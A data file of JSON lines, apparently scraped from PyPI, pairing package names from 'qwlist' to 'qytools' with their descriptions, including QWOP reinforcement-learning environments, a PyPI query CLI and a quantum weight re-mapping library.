8]xs=QList([1,2,3,4])double_xs=xs.map(lambdax:x*2).collect()print(double_xs)# [2, 4, 6, 8]Story behind this whole ideaPrime idea?Vicious mockery!During studying, I had to do a lot of list comprehensions in Python, alongside\nmethods such asmaporfilterand although they are quite powerful, using them\nin Python is just annoying. Combining them makes you read the code in an unnatural order going\nfrom right to left. That is the main reason that for a long time I preferred simple for-loops\nas opposed to using mentioned methods. Until one day my teacher asked the whole class why no one is using\nlist comprehensions and higher order functions.\"Do you guys know python?\" he asked tendentiously.\"I would use those functions if they were nicer\" I thought.During that period I also learnt Rust and immediately fell for it. Especially with how convenient\nit is to replace for-loops with method calls. 
And that's how the idea for a python packageqwlistwas born.I hereby announce that UwU, Qwery Listwu!"} +{"package": "qW-Map", "pacakge-description": "qW-Map: Weight Re-Mapping for Variational Quantum CircuitsA PyTorch implementation of Quantum Weight Re-MappingIn recent years, quantum machine learning has seen a substantial increase in the use of variational quantum circuits (VQCs). VQCs are inspired by artificial neural networks, which achieve extraordinary performance in a wide range of AI tasks as massively parameterized function approximators. VQCs have already demonstrated promising results, for example, in generalization and the requirement for fewer parameters to train, by utilizing the more robust algorithmic toolbox available in quantum computing. A VQCs' trainable parameters or weights are usually used as angles in rotational gates and current gradient-based training methods do not account for that. We introduce weight re-mapping for VQCs, to unambiguously map the weights to an interval of length $2\\pi$, drawing inspiration from traditional ML, where data rescaling, or normalization techniques have demonstrated tremendous benefits in many circumstances. We employ a set of five functions and evaluate them on the Iris and Wine datasets using variational classifiers as an example. Our experiments show that weight re-mapping can improve convergence in all tested settings. Additionally, we were able to demonstrate that weight re-mapping increased test accuracy for the Wine dataset by $10%$ over using unmodified weights.Link to Arxiv PaperImplemented FunctionsInstall$ pip install qw-mapExample:importpennylaneasqmlfromqw_mapimporttanhfromtorchimportTensordefcircuit(ws:Tensor,x:Tensor):qml.AngleEmbedding(x,rotation='X',wires=range(num_qubits))qml.StronglyEntanglingLayers(tanh(ws),wires=range(num_qubits))CitationTODO"} +{"package": "qwop-fast", "pacakge-description": "qwop-fast: A fast implementation of QWOP simulatorSame API ashttps://web.stanford.edu/class/cs168/qwop.py, but much faster.Installpip install qwop-fastBuild From SourceInstall Rust:https://rustup.rs/Install Maturin:pip install maturinBuild and install the package:maturin develop --releaseUse it:You can just follow the API ofhttps://web.stanford.edu/class/cs168/qwop.pyand just replaceimport qwopwithimport qwop_fast.importnumpyasnpimportqwop_fastplan=np.random.uniform(-1,1,40)qwop_fast.sim(plan)# return a floatYou can also simulate in batches. 
Batches will be executed in parallel.importnumpyasnpimportqwop_fastplan=np.random.uniform(-1,1,(100,40))qwop_fast.sim_batch(plan)# return a list of floats"} +{"package": "qwop-gym", "pacakge-description": "QWOP GymA Gym environment for Bennet Foddy's game calledQWOP.Give it a tryand see why it's such a\ngood candidate for Reinforcement Learning :)You should also check thisvideofor a demo.FeaturesA call to.step()advances exactly N game frames (configurable)Option to disable WebGL rendering for improved performanceSatisfies the Markov property *State extraction for a slim observation of 60 bytesReal-time visualization of various game stats (optional)Additional in-game controls for easier debugging* given the state includes the steps since last hard reset, see\u267b\ufe0f ResettingGetting startedInstallPython3.10 or higherInstall a chrome-based web browser (Google Chrome, Brave, Chromium, etc.)Downloadchromedriver116.0 or higherInstall theqwop-gympackage and patch QWOP.min.js from your terminal:pipinstallqwop-gym# Fetch & patch QWOP source codecurl-sLhttps://www.foddy.net/QWOP.min.js|qwop-gympatchCreate an instance in your code:importqwop_gymenv=gym.make(\"QWOP-v1\",browser=\"/browser/path\",driver=\"/driver/path\")Theqwop-gymtoolTheqwop-gymexecutable is a handy command-line tool which makes it easy to\nplay, record and replay episodes, train agents and more.Firstly, perform the initial setup:qwop-gym bootstrapPlay the game (use Q, W, O, P keys):qwop-gymplayExplore the other available commands:$qwop-gym-h\nusage:qwop-gym[options]\n\noptions:-h,--helpshowthishelpmessageandexit-cFILEconfigfile,defaultstoconfig/.yml\n\naction:playplayQWOP,optionallyrecordingactionsreplayreplayrecordedgameactionstrain_bctrainusingBehavioralCloning(BC)train_gailtrainusingGenerativeAdversarialImitationLearning(GAIL)train_airltrainusingAdversarialInverseReinforcementLearning(AIRL)train_ppotrainusingProximalPolicyOptimization(PPO)train_dqntrainusingDeepQNetwork(DQN)train_qrdqntrainusingQuantileRegressionDQN(QRDQN)spectatewatchatrainedmodelplayQWOP,optionallyrecordingactionsbenchmarkevaluatetheactions/sachievablewiththisenvbootstrapperforminitialsetuppatchapplypatchtooriginalQWOP.min.jscodehelpprintthishelpmessage\n\nexamples:qwop-gymplayqwop-gym-cconfig/record.ymlplayFor example, to train a PPO agent, editconfig/ppo.ymland run:pythonqwop-gymtrain_ppo[!WARNING]\nAlthough no rendering occurs during training, the browser window must remain\nopen as the game is actually running at very high speeds behind the curtains.Visualize tensorboard graphs:tensorboard--logdirdata/Configuremodel_fileinconfig/spectate.ymland watch your trained agent play the game:pythonqwop-gymspectateImitation[!NOTE]\nImitation learning is powered by theimitationlibrary, which\ndepends on the deprecatedgymlibrary which makes it incompatible with\nQwopEnv. This can be resolved as soon asimitationintroduces support forgymnasium. 
As a workaround, you can checkout theqwop-gymproject\nlocally and use thegym-compatbranch instead.# In this branch, QwopEnv works with the deprecated `gym` librarygitcheckoutgym-compat# Note that python-3.10 is required, see notes in requirements.txtpipinstall-rrequirements.txt# Patch the game again as this branch works with different pathscurl-sLhttps://www.foddy.net/QWOP.min.js|python-msrc.game.patcherFor imitation learning, first record some of your own games:pythonqwop-gym.pyplay-cconfig/record.ymlTrain an imitator viaBehavioral Cloning:pythonqwop-gym.pytrain_bcW&B sweepsIf you are a fan ofW&B, you can\nuse the provided configs inconfig/wandb/and create your own sweeps.wandbis a rather bulky dependency and is not installed by default. Install\nit withpip install wandbbefore proceeding with the below examples.# create a new W&B sweepwandbsweepconfig/wandb/qrdqn.yml# start a new W&B agentwandbagent/qwop/You can check out my W&B public QWOP projecthere.\nThere you can find pre-trained model artifacts (zip files) of some\nwell-performing agents, as well as see how they compare to each other. Thisyoutube videoshowcases some of\nthem.Developer documentationInfo about the Gym env can be foundhereDetails about the QWOP game can be foundhereSimilar projectshttps://github.com/Wesleyliao/QWOP-RLhttps://github.com/drakesvoboda/RL-QWOPhttps://github.com/juanto121/qwop-aihttps://github.com/ShawnHymel/qwop-aiIn comparison, qwop-gym offers several key features:the env isperformant- perfect for on-policy algorithms as observations\ncan be collected at great speeds (more than 2000 observations/sec on an Apple\nM2 CPU - orders of magnitute faster than the other QWOP RL envs).the env satisfies theMarkov property- there are no race conditions and\nrandomness can be removed if desired, so recorded episodes are 100% replayablethe env has asimple reward modeland compared to other QWOP envs, it is\nless biased, eg. no special logic for stuff likeknee bending,low torso height,vertical movement, etc.the env allows all possible key combinations (15), other QWOP envs usually\nallow only the \"useful\" 8 key combinations.great results (fast, human-like running) achieved by RL agents trained\nentirely through self-play, without pre-recorded expert demonstrationsqwop-gym already contains scripts for training with 6 different algorithms\nand adding more to the list is simple - this makes it suitable for exploring\nand/or benchmarking a variety of RL algorithms.qwop-gym uses reliable open-source implementations of RL algorithms in\ncontrast to many other projects using \"roll-your-own\" implementations.QWOP's original JS source code is barely modified: 99% of all extra\nfunctionality is designed as a plugin, bundled separately and only a \"diff\"\nof QWOP.min.js is published here (in respect to Benett Foddy's kind request\nto refrain from publishing the QWOP source code as part of isnotopen-source).CaveatsThe below list highlights some areas in which the project could use some\nimprovements:the OS may put some pretty rough restrictions on the web browser's rendering\nas soon as it's put in the background (on OS X at least). Ideally, the browser\nshould run in a headless mode, but I couldn't find a headless browser that can\nsupport WebGL.gymis deprecated since October 2022, but theimitationlibrary still\ndoes not officially supportgymnasium. 
As soon as that is addressed, it will no longer be necessary to use the special gym-compat branch here for imitation learning. wandb uses a monkey-patch for collecting tensorboard logs which does not work well with GAIL/AIRL/BC (and possibly other algorithms from imitation). As a result, graphs in wandb have odd names. This is mostly an issue with the wandb and/or imitation libraries, but there may be a way to work around it here. The firefox browser and geckodriver are not supported as an alternative browser/driver pair, but adding support for them should be fairly easy. Contributing: here is a simple guide to follow if you want to contribute to this project. Find an existing issue to work on, or submit a new issue that you are also going to fix; make sure to announce that you are working on a fix for the issue you picked. Branch out from the latest main. Make sure you have formatted your code with the black formatter. Commit and push your changes in your branch. Submit a PR."} +{"package": "qworder", "pacakge-description": "No description available on PyPI."} +{"package": "qworker", "pacakge-description": "QueueWorker. QueueWorker is an asynchronous task-queue implementation built to work with asyncio. You can spawn distributed workers to run functions inside workers and outside of the event loop. QueueWorker requires Python 3.8+ and is distributed under the MIT license. How do I get set up? First, you need to install QueueWorker: pip install qworker. Then, you can start several workers (even sharing the same port): qw --host <host> --port <port> --worker <workers>, where <host> is the hostname of the server, <port> is the port that the server will listen on, and <workers> is the number of worker processes. License: QueueWorker is copyright of Jesus Lara (https://phenobarbital.info) and is under the MIT license. I am providing code in this repository under an open source license; remember, this is my personal repository, and the license that you receive is from me and not from my employer."} +{"package": "qworkerd", "pacakge-description": "A baseline Django/Celery worker extensible by configured imports."} +{"package": "qworker_sample", "pacakge-description": "UNKNOWN"} +{"package": "qworktree", "pacakge-description": "qworktree. qworktree is a simple tool for managing a Qt worktree without maintaining the main xxx.pro by hand. It is designed to create the main .pro file at the root path of the tree (where you execute it). It has some constraints that I have not yet managed to remove: the MK_FEATURE element must be declared, and it generates 2 files in the root directory. Instructions: this tool creates the main .pro file of your worktree. qworktree is under a FREE license that can be found in the LICENSE file. Any contribution is more than welcome ;) git repository: http://github.com/HeeroYui/qworktree/ Installation. Requirements: Python >= 2.7 and pip. Just run: pip install qworktree. Install pip on debian/ubuntu: sudo apt-get install pip. Install pip on ARCH-linux: sudo pacman -S pip. Install pip on MacOs: sudo easy_install pip. Usage. Download your worktree and run the command: qworktree
export QMAKEFEATURES=`pwd`/mkfeatures
mkdir build
cd build
qmake ..
qworktree will generate local files: folder_name.pro ==> the file of the worktree description; defines.prf ==> a file that defines a list of dependency macros. Creating the needed elements. 1: A mkfeature is needed to add an include that determines the main root worktree: mkfeatures/root_directory.prf
ROOT_DIRETORY += $${PWD}/..
ROOT_DEFINES += $${PWD}/../defines.prf
load(../defines.prf)
2: Create a file in your library/plugin/application
folder:folderName/qworktree_folderName.py#!/usr/bin/python\n# -*- coding: utf-8 -*-\ndepend_on = [\n\"depend_worktree_lib1_name\",\n\"depend_worktree_lib2_name\"\n\t]3: Create a file in your worktree with the dependency property:folderName/dependencies.priINCLUDEPATH += $$PWD\nLIBS *= -llibraryName4: Import the library elements:load(root_directory.prf)\n # request include properties\n include($$ROOT_DIRETORY/$$LIB_DECLARE_DEPENDENCIES_FOLDERNAME1)\n include($$ROOT_DIRETORY/$$LIB_DECLARE_DEPENDENCIES_MYLIB2)Note that the define is generate in the filedefines.prfLicense (MPL v2.0)Copyright qworktree Edouard DUPINLicensed under the Mozilla Public License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License athttps://www.mozilla.org/MPL/2.0/Unless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License."} +{"package": "qwota", "pacakge-description": "Quickly check AppliedClusterResourceQuota.Login to a cluster on the command line using kubectl/oc then run qwota."} +{"package": "qwq-package", "pacakge-description": "Summing two numbers by addition"} +{"package": "qx", "pacakge-description": "quickxorA tool and file format for encoding and decoding data with an ASCII key"} +{"package": "qx-aliyun-sms", "pacakge-description": "No description available on PyPI."} +{"package": "qxbranch.quantum-feature-detector", "pacakge-description": "OverviewQxBranch\u2019s Quantum Feature Detector (QxQFD) is a Python library providing a configurable class of quantum machine\nlearning functions. It provides a simple interface for using quantum transformations to detect features in data as part\nof a machine learning application stack, on Rigetti\u2019s QCS.RequirementsQxQFD requires the following Python packages:Python 3.6Pyquil 2.0.0numpymatplotlibscikit-learnnetworkxQxQFD officially supports Linux 18.04.UsageQxQFD can be used with a Rigetti Forest QMI, or a local machine running the Forest SDK QVM.Included with QxQFD are three demonstration notebooks providing examples of the library\u2019s use. They can be found in the\n\u2018demo\u2019 folder. The CIFAR-10 data required for the third notebook can be found athttps://www.cs.toronto.edu/~kriz/cifar.html.DocumentationComplete documentation is available on QxBranch\u2019s website athttps://www.qxbranch.com/manuals/quantum_feature_detector.At this address you can also find some demonstration iPython notebooks.About QxBranchQxBranch is a quantum computing and data analytics software company founded in 2014, based in Washington DC with offices\nin London, UK, and Adelaide, Australia. QxBranch specializes in the development of quantum computing software and data\nanalytics services. 
To learn more about QxBranch, visithttps://www.qxbranch.com.LicenseCopyright 2018 QxBranch, Inc.Licensed under the Apache License, Version 2.0 (the \u201cLicense\u201d);\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License athttps://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \u201cAS IS\u201d BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License."} +{"package": "qxelarator", "pacakge-description": "QX SimulatorA universal quantum computer simulator. Allows simulation of a quantum circuit written incQasm.Runs as aPython moduleor an executable binary.For detailed documentation, please visitthe ReadTheDocs page, to find e.g.:installation instructionsusage.LicensingQX-simulator is licensed under the Apache License, Version 2.0. SeeLICENSEfor the full\nlicense text."} +{"package": "qxHello", "pacakge-description": "qx-hellogood first Python package to print your name."} +{"package": "qxm_nester", "pacakge-description": "UNKNOWN"} +{"package": "qx-ray", "pacakge-description": "/qx_ray"} +{"package": "qx-rest", "pacakge-description": "qx-rest PackageThis is a simple Phabrix Qx REST interface package."} +{"package": "qxxkey", "pacakge-description": "No description available on PyPI."} +{"package": "qy", "pacakge-description": "qy is queue"} +{"package": "qyaml-smartptr", "pacakge-description": "QYAML \u2014 query YAML with YAML with YAML resultWalk synchronously throughqueryanddoc, and print the list of matching branches ofdocas a YAML document.Result is printed to standard output as a list of found matches, including their keys.Givenfile.yaml:dict:first:value1second:value2QYAML may be used to query, for example, the value of thefirstkey of thedictdictionary:$qyaml\"dict: first\"] [] []Global Option-iURL,--index-urlURLQuery the Python package server at the given URL, which\nmust support both theXML-RPCandJSONAPIs. By\ndefault,qypiqueriesPyPI (Warehouse)athttps://pypi.org/pypi.List Packageslistqypi listList all packages registered on PyPI, one per line, in the order that they are\nreturned by the API.listandreadmeare the only subcommands that do\nnot output JSON.searchqypi search [--and|--or] [--packages|--releases] ...Search PyPI for packages or package releases matching the given search terms.\nSearch terms consist of a field name and a value separated by a colon; a term\nwithout a colon searches thedescriptionfield. As documentedhere, the supported\nsearchable fields are:nameversionauthorauthor_emailmaintainermaintainer_emailhome_page(aliases:homepageandurl)licensesummarydescription(aliases:long_descriptionandreadme)keywords(alias:keyword)platformdownload_urlAll other fields are ignored.Multiple search terms referring to the same field are combined with logical OR.\nSearch terms on different fields are combined according to whether--andor--oris specified on the command line; the default behavior is--and.By default,searchlists every matching release for every package, even if\nthe same package has multiple matching releases. 
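The qyaml-smartptr entry above describes walking query and doc in step and printing the matching branches, including their keys. The following is a conceptual sketch of that walk using plain PyYAML; it is an illustration of the described behaviour, not the package's own code, and it reuses the file.yaml and "dict: first" example from the description.

# Conceptual sketch of a query-and-doc walk in the spirit of qyaml-smartptr.
# This is an illustration with PyYAML, not the package's implementation.
import sys
import yaml

def walk(query, doc):
    """Yield branches of `doc` selected by `query`, walking both in step."""
    if isinstance(query, dict) and isinstance(doc, dict):
        for key, sub_query in query.items():
            if key in doc:
                for match in walk(sub_query, doc[key]):
                    yield {key: match}
    elif isinstance(query, str) and isinstance(doc, dict) and query in doc:
        yield {query: doc[query]}
    elif query is None or query == doc:
        yield doc

if __name__ == "__main__":
    query = yaml.safe_load(sys.argv[1])  # e.g. "dict: first"
    with open("file.yaml") as fh:
        doc = yaml.safe_load(fh)
    # Print the list of found matches, keys included, as a YAML document.
    print(yaml.safe_dump(list(walk(query, doc)), default_flow_style=False))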
To list no more than one\nrelease (specifically, the highest-versioned) per package, specify the-p/--packagesoption on the command line.-r/--releasesrestores the default behavior.browseqypi browse [-f|--file ] [--packages|--releases] ...List packages or package releases with the giventrove classifiers. Because trove\nclassifiers are not the most command-line friendly thing in the world, they may\noptionally be read from a file, one classifier per line. Any further\nclassifiers listed on the command line will be added to the file\u2019s list.By default,browselists every matching release for every package, even if\nthe same package has multiple matching releases. To list no more than one\nrelease (specifically, the highest-versioned) per package, specify the-p/--packagesoption on the command line.-r/--releasesrestores the default behavior.ownedqypi owned ...List packages owned or maintained by the given PyPI usersPackage Informationreleasesqypi releases ...List the released versions for the given packages in PEP 440 orderExample:$ qypi releases qypi\n{\n \"qypi\": [\n {\n \"is_prerelease\": false,\n \"release_date\": \"2017-04-02T03:07:42\",\n \"release_url\": \"https://pypi.org/project/qypi/0.1.0\",\n \"version\": \"0.1.0\"\n },\n {\n \"is_prerelease\": false,\n \"release_date\": \"2017-04-02T03:32:44\",\n \"release_url\": \"https://pypi.org/project/qypi/0.1.0.post1\",\n \"version\": \"0.1.0.post1\"\n }\n ]\n}A release\u2019s release date is the time at which its first file was uploaded. If\nthere are no files associated with a release, its release date will benull.ownerqypi owner ...List the PyPI users that own and/or maintain the given packagesExample:$ qypi owner requests\n{\n \"requests\": [\n {\n \"role\": \"Owner\",\n \"user\": \"graffatcolmingov\"\n },\n {\n \"role\": \"Owner\",\n \"user\": \"kennethreitz\"\n },\n {\n \"role\": \"Owner\",\n \"user\": \"Lukasa\"\n },\n {\n \"role\": \"Maintainer\",\n \"user\": \"graffatcolmingov\"\n },\n {\n \"role\": \"Maintainer\",\n \"user\": \"Lukasa\"\n },\n {\n \"role\": \"Maintainer\",\n \"user\": \"nateprewitt\"\n }\n ]\n}Release InformationThese subcommands show information about individual package releases/versions\nand share the same command-line options and argument syntax.Arguments of the formpackage==version(e.g.,qypi infoqypi==0.1.0)\nalways refer to the given version of the given package.Arguments that are just a package name refer to (by default) the\nhighest-numbered non-prerelease version of the package. This can be changed\nwith the following options:-A,--all-versionsShow information for all versions of each package (in\nPEP 440 order, excluding prereleases unless--preis given)--latest-versionShow information for only the latest version of each\npackage; this is the default--newestDefine \u201clatest version\u201d to mean the most recently\nreleased version. 
Release dates are based on file\nupload times; releases without file uploads are thus\nignored.--highestDefine \u201clatest version\u201d to mean the highest-numbered\nversion; this is the default.--preInclude prerelease & development versions--no-preDon\u2019t include prerelease & development versions; this\nis the default.infoqypi info [] [--description] [--trust-downloads] ...Show basic information about the given package releases.By default, (long) descriptions are omitted because they can beverylong,\nand it is recommended that you view them with thereadmesubcommand\ninstead; use the--descriptionoption to include them anyway.By default, download counts are omitted becausethe feature is currently\nbroken & unreliable; use the--trust-downloadsoption if you want to see the values anyway.Example:$ qypi info qypi\n[\n {\n \"bugtrack_url\": null,\n \"classifiers\": [\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: System :: Software Distribution\"\n ],\n \"docs_url\": null,\n \"download_url\": null,\n \"keywords\": \"pypi warehouse search packages pip\",\n \"license\": \"MIT\",\n \"name\": \"qypi\",\n \"people\": [\n {\n \"email\": \"qypi@varonathe.org\",\n \"name\": \"John Thorvald Wodder II\",\n \"role\": \"author\"\n }\n ],\n \"platform\": null,\n \"project_url\": \"https://pypi.org/project/qypi/\",\n \"release_date\": \"2017-04-02T03:32:44\",\n \"release_url\": \"https://pypi.org/project/qypi/0.1.0.post1/\",\n \"requires_python\": \"~=3.4\",\n \"summary\": \"Query PyPI from the command line\",\n \"url\": \"https://github.com/jwodder/qypi\",\n \"version\": \"0.1.0.post1\"\n }\n]readmeqypi readme [] ...Display the given package releases\u2019 (long) descriptions in a pager one at a\ntime.listandreadmeare the only subcommands that do not output\nJSON.filesqypi files [] [--trust-downloads] ...List files available for download for the given package releases. 
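Since every qypi subcommand other than list and readme emits JSON, the CLI is easy to drive from a script. Below is a small sketch that shells out to qypi and parses the output, following the example outputs shown in this entry; it assumes qypi is installed and on PATH, and the package name is only an example.

# Sketch: calling the qypi CLI from Python and consuming its JSON output.
import json
import subprocess

def qypi_json(*args: str):
    """Run a qypi subcommand and parse its JSON output."""
    result = subprocess.run(
        ["qypi", *args], capture_output=True, text=True, check=True
    )
    return json.loads(result.stdout)

# `qypi releases <pkg>` maps the package name to a list of version records.
releases = qypi_json("releases", "requests")
for entry in releases["requests"]:
    print(entry["version"], entry["release_date"])

# `qypi info <pkg>` returns a list; by default only the latest non-prerelease version.
info = qypi_json("info", "requests")
print(info[0]["version"], "-", info[0]["summary"])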
Download\ncounts are omitted becausethe feature is currently broken & unreliable; use the--trust-downloadsoption if you want to see the values anyway.Example:$ qypi files qypi\n[\n {\n \"files\": [\n {\n \"comment_text\": \"\",\n \"digests\": {\n \"md5\": \"58863d77e19bf4aa1ae85026cc1ff0f6\",\n \"sha256\": \"5946a4557550479af90278e5418cd2c32a2626936075078a4c7096be52d43078\"\n },\n \"filename\": \"qypi-0.1.0.post1-py3-none-any.whl\",\n \"has_sig\": true,\n \"md5_digest\": \"58863d77e19bf4aa1ae85026cc1ff0f6\",\n \"packagetype\": \"bdist_wheel\",\n \"python_version\": \"py3\",\n \"size\": 13590,\n \"upload_time\": \"2017-04-02T03:32:44\",\n \"url\": \"https://files.pythonhosted.org/packages/f9/3f/6b184713e79da15cd451f0dab91864633175242f4d321df0cacdd2dc8300/qypi-0.1.0.post1-py3-none-any.whl\"\n },\n {\n \"comment_text\": \"\",\n \"digests\": {\n \"md5\": \"bfd357b3df2c2f1cbb6d23ff7c61fbb9\",\n \"sha256\": \"c99eea315455cf9fde722599ab67eeefdff5c184bb3861a7fd82f8a9387c252d\"\n },\n \"filename\": \"qypi-0.1.0.post1.tar.gz\",\n \"has_sig\": true,\n \"md5_digest\": \"bfd357b3df2c2f1cbb6d23ff7c61fbb9\",\n \"packagetype\": \"sdist\",\n \"python_version\": \"source\",\n \"size\": 8975,\n \"upload_time\": \"2017-04-02T03:32:46\",\n \"url\": \"https://files.pythonhosted.org/packages/0e/49/3056ee68b44c8eab4d4698b52ae4d18c0db92c80abc312894c02c4722621/qypi-0.1.0.post1.tar.gz\"\n }\n ],\n \"name\": \"qypi\",\n \"version\": \"0.1.0.post1\"\n }\n]"} +{"package": "qyrm-pipinject", "pacakge-description": "No description available on PyPI."} +{"package": "qyrm-pipinject1", "pacakge-description": "No description available on PyPI."} +{"package": "qyrm-pipinject2", "pacakge-description": "No description available on PyPI."} +{"package": "qyrm-pipinject3", "pacakge-description": "No description available on PyPI."} +{"package": "qyrm-pipinject4", "pacakge-description": "No description available on PyPI."} +{"package": "qytang_devnet", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qyt_devnet", "pacakge-description": "No description available on PyPI."} +{"package": "qython", "pacakge-description": "UNKNOWN"} +{"package": "qytools", "pacakge-description": "\ud83d\udce6 qytools\u6587\u4ef6\u5185\u5bb9db_read.py\u6570\u636e\u5e93\u53d6\u51fa\u6570\u636edb_maintain.py\u6570\u636e\u5e93\u5f55\u5165\u6570\u636etools.py\u6570\u636e\u5e93/\u56e0\u5b50\u6784\u9020\u76f8\u5173\u5b9e\u7528\u5de5\u5177\u5305stack.py\u5806\u6808\u524d\u8a00\u64cd\u4f5c\u4e2d\u8d22\u91cf\u5316\u7814\u7a76\u9662\u6240\u62e5\u6709\u7684\u5168\u90e8sqlite3\u6570\u636e\u5e93\uff0c\u5177\u4f53\u64cd\u4f5c\u89c1\u4e0b\u9762\u76f8\u5173\u6587\u4ef6\u63cf\u8ff0\u6bd4\u5e38\u89c4select\u8bed\u53e5\u901f\u5ea6\u9ad8\u51fa\u6570\u500d~\u6570\u5341\u500d\uff0c\u6570\u636e\u91cf\u8d8a\u5927\u63d0\u5347\u901f\u5ea6\u8d8a\u660e\u663e\u4ec5\u4f9b\u4e2d\u8d22\u91cf\u5316\u7814\u7a76\u9662\u6210\u5458\u5b66\u4e60\u4f7f\u7528dbread\u91c7\u53d6\u5185\u7f6e\u6587\u6863\u7684\u5f62\u5f0f\uff0c\u5bf9\u63a5\u53e3\u4f7f\u7528\u6709\u7591\u95ee\u53ef\u4ee5\u76f4\u63a5\u53c2\u8003README+\u5185\u7f6e\u6587\u6863\u4f5c\u8005qytools\u00a9yulin qiu, Released under theMITLicense.qq: 492876854Weixin: QQ492876854e-mail:x492876854@qq.com\u73af\u5883\u51c6\u5907pipreqs==0.4.10pandas>=1.0.1numpy>=1.16.2tushare>=1.2.52\u4f7f\u7528\u51c6\u5907dbread\u63a5\u53e3\u529f\u80fd\u9700\u8981\u4f7f\u7528tushare\uff0c\u9700\u8981\u786e\u4fdd\u672c\u673a\u62e5\u6709tushare\u5305\u5e76\u4e14\u5df2\u7ecf\u6267\u884c\u8fc7set_token\u5c3d\u91cf\u786e\u4fddtushare\u62e5\u6709200\u4ee5\u4e0a\u79ef\u5206\uff0c\u6216\u8005\u5165tushare\u5b98\u65b9\u7fa4\u8054\u7cfb\u7ba1\u7406\u5458\u5b66\u751f\u53ef\u4ee5\u62e5\u6709\u514d\u8d39\u4f7f\u7528\u6743\u9650\u9996\u6b21\u4f7f\u7528tushare\u9700\u8981\u6839\u636e\u5b98\u7f51\u6307\u793a\u8bbe\u7f6etoken200\u4ee5\u4e0a\u79ef\u5206\uff0c\u6216\u8005\u5165tushare\u5b98\u65b9\u7fa4\u8054\u7cfb\u7ba1\u7406\u5458\u5426\u5219qytools\u90e8\u5206\u529f\u80fd\u65e0\u6cd5\u4f7f\u7528\uff0c\u4e4b\u540e\u5168\u5c40\u6709\u6548\uff0c\u65e0\u9700\u8bbe\u7f6e\u6587\u4ef6\u6587\u6863db_read.py\u57fa\u4e8e\u80a1\u7968sqlite\u6570\u636e\u5e93\u7684\u901a\u7528\u578b\u63a5\u53e3class: DbReader\uff0c\u4f7f\u7528\u6d41\u7a0bfrom qyltools import Dbreader\u9996\u6b21\u4f7f\u7528\u65f6\u9884\u5148\u6267\u884c\u4e00\u6b21\uff0c\u6267\u884c\u6210\u529f\u540e\u7565\u8fc7\uff0c\u8fdb\u884c\u6b65\u9aa43\uff08\u7c7b\u4f3ctushare set_token\uff09\uff1aDbreader.firsttime_setconfig(sqlite3\u6570\u636e\u6587\u4ef6\u5b58\u653e\u76ee\u5f55)\u4f8b\u5982\uff1aDbreader.firsttime_setconfig(r'D:\\learn\\navicat\\data'\uff09read = 
Dbreaderread.read_ts_day_data(\u53c2\u6570)\u4e3b\u8981\u62e5\u6709\u4ee5\u4e0b\u529f\u80fd\u8bfb\u53d6\u6570\u636e\u7c7bread_tdx_1min_data\u83b7\u53d6\u5206\u949f\u6570\u636eread_ts_top_inst\u83b7\u53d6\u9f99\u864e\u699c\u673a\u6784\u660e\u7ec6read_ts_top_list\u83b7\u53d6\u9f99\u864e\u699c\u80a1\u7968\u660e\u7ec6read_ts_day_data\u83b7\u53d6\u65e5\u7ebf\u7efc\u5408\u6570\u636eread_ts_index_daily\u83b7\u53d6\u6307\u6570\u65e5\u7ebf\u6570\u636eread_ts_limit_list\u83b7\u53d6\u6bcf\u65e5\u6da8\u505c\u677f\u6570\u636eread_ts_moneyflow_hsgt\u83b7\u53d6\u6caa\u6df1\u6e2f\u901a\u8d44\u91d1\u6d41\u6570\u636eread_concept_data\u83b7\u53d6\u677f\u5757\u4fe1\u606fread_jj_1min_index_data\u83b7\u53d6\u6307\u6570\u5206\u949f\u6570\u636e\uff08\u6398\u91d1\u6570\u636e\u6e90\uff09read_fundamentals\u83b7\u53d6\u80a1\u7968\u516c\u53f8\u8d22\u52a1\u6570\u636eread_strategy\u83b7\u53d6AI\u7b56\u7565\u56e0\u5b50\u8868read_cal_market_1min_data\u83b7\u53d6\u8ba1\u7b97\u56e0\u5b50\u8868query_stock_day\u901a\u7528\u578b\u80a1\u7968\u65e5\u7ebf\u6570\u636e\u8868\u63a5\u53e3query_stock_min\u901a\u7528\u578b\u80a1\u7968\u5206\u949f\u6570\u636e\u8868\u63a5\u53e3query_index_day\u901a\u7528\u578b\u6307\u6570\u65e5\u7ebf\u6570\u636e\u8868\u63a5\u53e3query_index_min\u901a\u7528\u578b\u6307\u6570\u5206\u949f\u6570\u636e\u8868\u63a5\u53e3query_market_min\u901a\u7528\u578b\u5e02\u573a\u5206\u949f\u6570\u636e\u8868\u63a5\u53e3query_market_day\u901a\u7528\u578b\u5e02\u573a\u65e5\u7ebf\u6570\u636e\u8868\u63a5\u53e3query_stock_limitday\u83b7\u53d6\u80a1\u7968\u6307\u5b9a\u65f6\u95f4\u957f\u5ea6\u7684\u65e5\u7ebf\u6570\u636e\u63a5\u53e3\uff08\u5904\u7406\u505c\u724c\u80a1\u4e13\u7528\uff09\u4e3b\u8981\u53c2\u6570\u8bf4\u660estart\u2013 \u5f00\u59cb\u65e5\u671f\uff0c\u5fc5\u9009\uff0c\u652f\u6301int(20180808), datetime('2018-08-08 00:00:00'), str('20180808')end\u2013 \u7ed3\u675f\u65e5\u671f \uff0c\u5fc5\u9009\uff0c\u652f\u6301\u540cstartfields\u2013 \u8981\u4ece\u5e93\u4e2d\u53d6\u51fa\u7684\u5217\u540d,\u9ed8\u8ba4\u53d6\u6240\u6709\uff0c\u652f\u6301str\u548clist[str]\uff0c\u4f8b\u5982'code,high', ['code','high']code\u2013 